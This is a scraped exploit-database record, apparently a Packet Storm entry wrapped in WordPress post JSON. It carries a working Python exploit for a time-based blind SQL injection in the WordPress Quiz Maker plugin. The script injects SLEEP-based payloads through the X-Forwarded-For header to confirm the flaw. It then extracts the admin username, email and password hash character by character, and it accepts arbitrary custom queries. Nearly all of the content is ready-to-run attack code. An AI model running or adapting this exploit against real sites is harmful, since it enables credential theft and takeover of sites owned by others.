{“lastseen”:”2026-01-07T21:45:46″,”description”:”WordPress Quiz Maker plugin versions 6.7.0.56 and below suffer from a remote SQL injection vulnerability…”,”published”:”2026-01-07T00:00:00″,”modified”:”2026-01-07T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 WordPress Quiz Maker 6.7.0.56 SQL Injection”,”source”:””,”references”:””,”id”:”PACKETSTORM:213574″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2025-10042″],”sourceData”:”# Exploit Title: WordPress Quiz Maker 6.7.0.56 – SQL Injection\\n # Date: 2025-12-16\\n # Exploit Author: Rahul Sreenivasan (Tr0j4n)\\n # Vendor Homepage: https:\/\/ays-pro.com\/wordpress\/quiz-maker\\n # Software Link: https:\/\/wordpress.org\/plugins\/quiz-maker\/\\n # Version: \\u003c= 6.7.0.56\\n # Tested on: WordPress 6.x with Quiz Maker 6.7.0.56 on Ubuntu\/Nginx\/PHP-FPM\\n # CVE: CVE-2025-10042\\n \\n from argparse import ArgumentParser\\n from requests import get\\n from requests.packages.urllib3 import disable_warnings\\n from requests.packages.urllib3.exceptions import InsecureRequestWarning\\n from time import time\\n from sys import exit\\n \\n disable_warnings(InsecureRequestWarning)\\n \\n CHARSET = \\”0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ_-@.!$\/:?\\”\\n \\n def send_payload(url, path, header, payload, timeout):\\n target = f\\”{url.rstrip(‘\/’)}\/{path.lstrip(‘\/’)}\\”\\n headers = {\\n \\”User-Agent\\”: \\”Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36\\”,\\n header: payload\\n }\\n try:\\n start = time()\\n get(target, headers=headers, timeout=timeout, verify=False)\\n return time() – start\\n except:\\n return timeout\\n \\n def check_vulnerable(url, path, header, sleep_time, timeout):\\n print(\\”[*] Testing for SQL injection vulnerability…\\”)\\n \\n baseline = send_payload(url, path, header, \\”127.0.0.1\\”, timeout)\\n print(f\\”[*] Baseline response time: {baseline:.2f}s\\”)\\n \\n payload = f\\”1′ OR SLEEP({sleep_time})#\\”\\n injection = send_payload(url, path, header, payload, timeout)\\n print(f\\”[*] Injection response time: {injection:.2f}s\\”)\\n \\n if injection \\u003e= sleep_time * 0.7:\\n print(\\”[+] Target is VULNERABLE!\\”)\\n return True\\n else:\\n print(\\”[-] Target does not appear to be vulnerable.\\”)\\n return False\\n \\n def extract_length(url, path, header, query, timeout):\\n low, high = 1, 100\\n \\n while low \\u003c high:\\n mid = (low + high) \/\/ 2\\n payload = f\\”1′ OR IF(LENGTH(({query}))\\u003e{mid},SLEEP(1),0)#\\”\\n elapsed = send_payload(url, path, header, payload, timeout)\\n \\n if elapsed \\u003e= 0.8:\\n low = mid + 1\\n else:\\n high = mid\\n \\n return low\\n \\n def extract_char(url, path, header, query, position, timeout):\\n low, high = 32, 126\\n \\n while low \\u003c high:\\n mid = (low + high) \/\/ 2\\n payload = f\\”1′ OR IF(ASCII(SUBSTRING(({query}),{position},1))\\u003e{mid},SLEEP(1),0)#\\”\\n elapsed = send_payload(url, path, header, payload, timeout)\\n \\n if elapsed \\u003e= 0.8:\\n low = mid + 1\\n else:\\n high = mid\\n \\n return chr(low) if low \\u003c= 126 else \\”?\\”\\n \\n def extract_data(url, path, header, query, timeout):\\n length = extract_length(url, path, header, query, timeout)\\n print(f\\”[*] Data length: {length}\\”)\\n \\n result = \\”\\”\\n for i in range(1, length + 1):\\n char = extract_char(url, path, header, query, i, timeout)\\n result += char\\n print(f\\”\\\\r[*] Extracting: {result}\\”, end=\\”\\”, flush=True)\\n \\n print()\\n return result\\n \\n def dump_users(url, path, header, timeout):\\n print(\\”\\\\n[*] Extracting WordPress admin users…\\”)\\n \\n # Get admin user login\\n query = \\”SELECT user_login FROM wp_users WHERE ID=1\\”\\n username = extract_data(url, path, header, query, timeout)\\n print(f\\”[+] Username: {username}\\”)\\n \\n # Get admin email\\n query = \\”SELECT user_email FROM wp_users WHERE ID=1\\”\\n email = extract_data(url, path, header, query, timeout)\\n print(f\\”[+] Email: {email}\\”)\\n \\n # Get password hash\\n query = \\”SELECT user_pass FROM wp_users WHERE ID=1\\”\\n password = extract_data(url, path, header, query, timeout)\\n print(f\\”[+] Password Hash: {password}\\”)\\n \\n return username, email, password\\n \\n def main():\\n parser = ArgumentParser(description=\\”WordPress Quiz Maker SQLi Exploit (CVE-2025-10042)\\”)\\n parser.add_argument(\\”-u\\”, \\”–url\\”, required=True, help=\\”Target WordPress URL\\”)\\n parser.add_argument(\\”-p\\”, \\”–path\\”, required=True, help=\\”Path to quiz page\\”)\\n parser.add_argument(\\”-H\\”, \\”–header\\”, default=\\”X-Forwarded-For\\”, help=\\”Header for injection\\”)\\n parser.add_argument(\\”-t\\”, \\”–timeout\\”, type=int, default=10, help=\\”Request timeout\\”)\\n parser.add_argument(\\”–check\\”, action=\\”store_true\\”, help=\\”Only check vulnerability\\”)\\n parser.add_argument(\\”–dump\\”, action=\\”store_true\\”, help=\\”Dump admin credentials\\”)\\n parser.add_argument(\\”–query\\”, help=\\”Custom SQL query to extract\\”)\\n args = parser.parse_args()\\n \\n print(\\”[+] WordPress Quiz Maker SQLi Exploit (CVE-2025-10042)\\”)\\n print(f\\”[+] Target: {args.url}\\”)\\n \\n if not check_vulnerable(args.url, args.path, args.header, 3, args.timeout):\\n exit(1)\\n \\n if args.check:\\n exit(0)\\n \\n if args.dump:\\n dump_users(args.url, args.path, args.header, args.timeout)\\n elif args.query:\\n print(f\\”\\\\n[*] Executing custom query: {args.query}\\”)\\n result = extract_data(args.url, args.path, args.header, args.query, args.timeout)\\n print(f\\”[+] Result: {result}\\”)\\n else:\\n dump_users(args.url, args.path, args.header, args.timeout)\\n \\n if __name__ == \\”__main__\\”:\\n main()”,”sourceHref”:”https:\/\/packetstorm.news\/download\/213574″,”cvss”:{“score”:7.5,”severity”:”HIGH”,”vector”:”CVSS:3.1\/AV:N\/AC:L\/PR:N\/UI:N\/S:U\/C:H\/I:N\/A:N”,”version”:”3.1″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/213574\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2026-01-07T21:45:46″,”description”:”WordPress Quiz Maker plugin versions 6.7.0.56 and below suffer from a remote SQL injection vulnerability…”,”published”:”2026-01-07T00:00:00″,”modified”:”2026-01-07T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 WordPress Quiz Maker 6.7.0.56 SQL Injection”,”source”:””,”references”:””,”id”:”PACKETSTORM:213574″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2025-10042″],”sourceData”:”# Exploit Title: WordPress Quiz…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,16,12,15,13,53,7,11,5],"class_list":["post-34543","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-cvss-75","tag-exploit","tag-high","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n